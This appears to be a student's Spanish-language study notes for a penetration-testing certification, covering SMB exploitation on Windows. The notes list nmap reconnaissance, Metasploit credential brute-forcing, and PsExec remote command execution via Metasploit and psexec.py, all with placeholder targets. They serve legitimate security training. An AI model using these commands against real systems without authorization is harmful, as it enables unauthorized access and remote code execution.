⟁ HXA πŸ‡¬πŸ‡§ EN 
β”Œβ”€[ SMB ]────────────────────────────────────────────────────────────────────────────────────────────
β”‚ user: Alejandro Lopez Aguilar
β”” path: /apuntes/ejptv2/explotacion/windows/smb/
:: πŸ”Ž Reconocimiento con NMAP

β”Œβ”€[ code ]──────────────────────────────────────────────────────────────────────────────────────────
nmap -sCV <ip>
└───────────────────────────────────────────────────────────────────────────────────────────────────
Si pone el siguiente mensaje: Message signing enabled but not required podemos usar PsExec (Nos 
permite Ejecutar comandos)

El siguiente comando nos permitirΓ‘ ver el tipo de samba/smb que esta corriendo y despuΓ©s buscamos 
exploit respecto a la versiΓ³n

β”Œβ”€[ code ]──────────────────────────────────────────────────────────────────────────────────────────
nmap -p 445 --script smb-os-discovery <IP>
└───────────────────────────────────────────────────────────────────────────────────────────────────
:: πŸ” Fuerza bruta con metasploit

MΓ³dulo a utilizar: auxiliary/scanner/smb/smb_login

:: β–Έ PsExec con Metasploit (Recomendado)

MΓ³dulo a utilizar: exploit/windows/smb/psexec

β”Œβ”€[ code ]──────────────────────────────────────────────────────────────────────────────────────────
use exploit/windows/smb/psexec
set RHOSTS <IP>
set SMBUser <User>
set SMBPass <Password>
exploit
shell
└───────────────────────────────────────────────────────────────────────────────────────────────────
:: β–Έ PsExec

Si tenemos las credenciales y se cumple la condiciΓ³n mencionada arriba (Message signing enabled but 
not required) podemos usar la herramienta

β”Œβ”€[ code ]──────────────────────────────────────────────────────────────────────────────────────────
psexec.py <user>@<IP> cmd.exe
└───────────────────────────────────────────────────────────────────────────────────────────────────

ret <volume_4>  <indice>